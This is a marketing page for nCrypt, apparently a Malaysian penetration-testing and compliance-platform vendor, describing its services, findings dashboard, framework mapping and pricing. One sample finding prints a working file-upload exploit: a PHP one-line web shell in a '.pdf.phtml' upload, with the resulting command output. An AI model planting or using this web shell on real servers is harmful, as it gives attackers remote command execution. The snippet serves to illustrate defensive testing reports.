NACSA licence in progress
OSCP-CERTIFIED CONSULTANTS

Penetration Testing MalaysiaReal pentesters find it. The platform tracks it until it's fixed.

Manual penetration testing by certified consultants, then structured remediation and compliance evidence in one place. Findings carry CVSS ratings, owners and verification history.

Manual-led testing CVSS v4 findings Remediation verification
SAMPLE DATA

Vulnerabilities

Live SLA clocks · CVSS v4 · owner assignment

FINDINGCVSSSLA REMAINING
Unauthenticated RCE via file uploadapi.prod / POST /v1/documents9.807:40:12
Stored XSS in ticket comment fieldapp.prod / /support/tickets8.12d 04:24:00
IDOR exposes cross-tenant invoicesapi.prod / GET /v1/invoices7.63d 11:27:00
Session fixation on SSO callbackauth.prod / /callback6.49d 02:15:00
Verbose error discloses stack traceapi.prod / 500 handler3.121d 01:00:00
Scan running — api.prod · 2 public IPs0%
OSCP-certified consultantsCREST-aligned methodologyPTES · OWASP WSTG · NIST 800-115MYR pricing

Offensive security

Testing that ends with a fix, not a PDF.

Every engagement combines manual testing, evidence, remediation guidance and an included retest.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

Manual penetration testing

A finding engineers can act on.

Every verified finding includes its CVSS v4 vector, reproducible evidence, remediation guidance and a live SLA clock.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

CRITICALNCR-F-0412

Unauthenticated RCE via file upload

9.8

CVSS v4

AV:NAC:LAT:NPR:NUI:NVC:HVI:HVA:H
POST /v1/documents HTTP/1.1
Content-Type: multipart/form-data

filename="report.pdf.phtml"
<?php system($_GET[0]); ?>

> HTTP/1.1 201 Created
> uid=33(www-data) gid=33(www-data)
Verified manually · remediation attachedSLA 07:39:42

nCrypt Radar

Evidence that stays current after the test ends.

Findings, controls, evidence and audit access in one secure workspace — without spreadsheet archaeology.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

Findings with SLA clocks

Critical 24 hours, high 7 days, medium 30, low 90 — measured from the moment the finding lands, not from when someone reads the report.

Evidence vault with a hash trail

Every artefact fingerprinted on upload so an auditor can prove what was collected and when.

Continuous control monitoring

Automated tests re-evaluate your controls daily; a failing test marks the control it maps to as non-compliant.

Auditor and client access

Read-only rooms for your auditor and your own customers, instead of emailing PDFs around.

Walk through the platform

Compliance posture

Controls mapped once, reused across frameworks

SAMPLE DATA
0%ISO 27001
0%SOC 2
0%PDPA
0%RMiT
A.8.8 Management of technical vulnerabilitiesCHECKING
A.5.7 Threat intelligenceCHECKING
CC7.1 Detection of security eventsCHECKING
A.8.9 Configuration managementEVIDENCE STALE
A.8.9 evidence expired — owner notified before the audit windowUpload evidence

How engagement works

From scope to audit-ready proof.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

148 hours

Scope

You tell us the estate and the driver — an audit, a customer requirement, a board question. We come back with scope, fee and dates in writing.

2Engagement window

Test

Manual-led testing against PTES, OWASP WSTG and NIST 800-115, with findings raised as they are confirmed rather than held to the end.

3Your sprint

Remediate

Findings arrive in the platform with reproduction steps and a fix owner, ordered by severity and SLA rather than by page number.

4Included

Retest & attest

We verify the fixes at no extra charge, then package the evidence mapped to the framework your auditor or regulator asks about.

Hundreds

Engagements delivered

Across regulated sectors since 2020

OSCP

Certified consultants

Plus CEH; CREST-aligned methodology

48h

Scoped and quoted

Fixed fee after scoping

GMT+8

Local delivery

MYR pricing, BM and EN reporting

Compliance mapping

One control. Every framework it satisfies.

Collect evidence once, map it to Malaysian and global requirements, and keep the audit trail live.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

Platform pricing

Pricing that scales with your assurance programme.

Start with one framework, then reuse the same controls and evidence as requirements grow.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

Essentials

One framework, continuous monitoring, and the trust room.

RM 1,900/ month
Start with one framework
One framework — SOC 2, ISO 27001 or PDPA
Continuous control monitoring, re-run every 24h
Evidence vault with hash trail
Trust room with access requests
Policy templates and acknowledgement tracking

Growth

Multi-framework, annual pentest included, auditor access.

RM 3,800/ month
Get a scoped quote
Everything in Essentials
Unlimited frameworks with shared controls
Annual manual pentest with free retest
Auditor room with read-only evidence access
Vendor risk and access reviews
Questionnaire AI with citations

Enterprise

For regulated teams with their own auditors and SLAs.

Scopedquoted per engagement
Talk to an engineer
Everything in Growth
Quarterly testing and red team options
RMiT, PCI DSS and NACSA readiness programmes
SSO, SCIM and a named delivery lead
Contractual SLAs and BM + EN reporting

Pentest scoping

Build a first-pass scope in under a minute.

Choose what needs testing. We will validate the assumptions, fee and dates with you in writing before work starts.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

No obligation. Scoped in 48 hours, fixed fee after scoping.
ESTIMATED DURATION
3–5 days
ITEMS IN SCOPE
2

Typical for this shape: one window, findings raised as they're confirmed, retest 2 weeks after sign-off.

Send this scope

Straight answers

Questions teams ask before scoping.

Not sure what you need?

Tell us what needs testing and we come back with a fixed fee within 48 hours — no hourly estimates.

nCrypt Malaysia company logo

Ready to know what is actually exposed?

Tell us the estate and the deadline. An engineer will come back with scope, fee and dates. Scoped in 48 hours.